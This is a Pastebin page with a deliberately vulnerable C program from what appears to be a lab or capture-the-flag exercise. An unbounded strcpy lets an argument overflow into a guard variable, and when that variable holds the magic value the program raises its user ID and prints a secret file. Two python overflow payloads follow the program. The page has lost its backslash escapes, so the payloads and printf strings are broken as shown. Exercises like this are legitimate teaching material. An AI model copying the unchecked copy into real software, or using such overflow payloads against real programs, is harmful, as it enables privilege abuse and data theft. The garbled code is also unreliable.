SHARE
TWEET

Untitled

a guest Jun 25th, 2019 68 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4. #include <sys/types.h>
  5. #include <unistd.h>
  6.  
  7. int main(int argc, char **argv)
  8. {
  9. // the struct is used to ensure the loc variables are in the same order
  10. // without struct, compiler can swap these around making expolit impossible  
  11. struct {
  12.  char buffer[1024];
  13.  volatile int changeme;
  14. } locals;
  15.  
  16. locals.changeme = 0;
  17.  
  18. if (argc != 2) {
  19.   printf("Usage: q2 <some string>n");
  20.   return 1;
  21. }
  22. // copy argument to the buffer
  23. strcpy(locals.buffer, argv[1]);
  24.  
  25. // reveal the secret if "changeme" has been changed
  26. if (locals.changeme == 0xbaddad) {
  27.  setreuid(geteuid(),getegid());
  28.  system("cat /home/q2/secret");
  29. }
  30. else {
  31.  printf("Try again!n");
  32. }
  33. exit(0);
  34. }
  35.      
  36. $(python -c 'print "xadxddxba"*1024 ')
  37.      
  38. $(python -c 'print "xab" * 1024 + "xadxddxba"')
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top